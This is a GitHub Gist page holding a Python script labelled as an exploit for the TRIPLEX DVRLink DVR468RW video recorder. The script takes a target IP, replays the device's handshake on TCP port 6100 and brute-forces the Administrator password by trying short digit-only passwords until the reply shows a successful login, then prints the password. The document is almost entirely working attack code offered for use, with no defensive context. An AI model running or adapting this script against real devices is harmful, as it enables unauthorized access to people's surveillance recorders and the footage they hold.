Instantly share code, notes, and snippets.

Embed
What would you like to do?
TRIPLEX DVRLink DVR468RW Exploit
#!/usr/bin/env python
import socket
import binascii
import sys
import time
def passList():
n = 1
li = [1]
while (int(li[-1]) <= 44444444):
k = str_base(int(n))
if (k != 0):
li.append(k)
n = n + 1
return li
def asctohex(string_in):
a=""
for x in string_in:
a = a + ("0"+((hex(ord(x)))[2:]))[-2:]
return(a)
def getIP():
#Ask for IP
while True:
TCP_IP = input("Enter IP: ")
try:
socket.inet_aton(TCP_IP)
break
except socket.error:
print("Error, Try Again")
return TCP_IP
def connect(to, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((to, port))
return s
def makePassPacket(password):
packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator
packet += '0000eb030000920303000000000058d86701' #18 bytes of something...
packet += asctohex(password) #4 password
packet += '00'
size = len(packet)
need = 128-size #64 bits in hex
junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else
packet += junk[0:need]
return packet
def str_base(num, base=5, numerals = '01234'):
if base < 2 or base > len(numerals):
raise ValueError("str_base: base must be between 2 and %i" % len(numerals))
result = ''
while num:
result = numerals[num % (base)] + result
num //= base
if result.count('0') > 0:
return 0
return result
TCP_IP = getIP()
TCP_PORT = 6100
print('Generating password list..')
passwords = passList()
print('Running...')
msg1=binascii.unhexlify('01010000')
msg2=binascii.unhexlify('01010004')
msg4=binascii.unhexlify('01200040')
for password in passwords:
s1 = connect(TCP_IP,TCP_PORT)
#socket 1 data 1
s1.send(msg1)
s1.settimeout(5)
data1 = s1.recv(4)
data2 = s1.recv(4)
if (binascii.b2a_hex(data1) != b'02000008'):
sys.exit("First packet incorect")
s2 = connect(TCP_IP,TCP_PORT)
#socket 2 data 1
s2.send(msg2)
msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8])
s2.send(msg3)
s2.settimeout(5)
data3 = s2.recv(4)
data4 = s2.recv(8)
if (binascii.b2a_hex(data3) != b'02000004'):
sys.exit("Second packet incorect")
#socket 1 data 2
passPacket = makePassPacket(str(password))
s1.send(msg4)
s1.send(binascii.unhexlify(passPacket))
data5 = s1.recv(8)
data6 = s1.recv(8)
if (binascii.b2a_hex(data6) != b'02160000' ):
print('Password:',password)
sys.exit()
time.sleep(0.1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment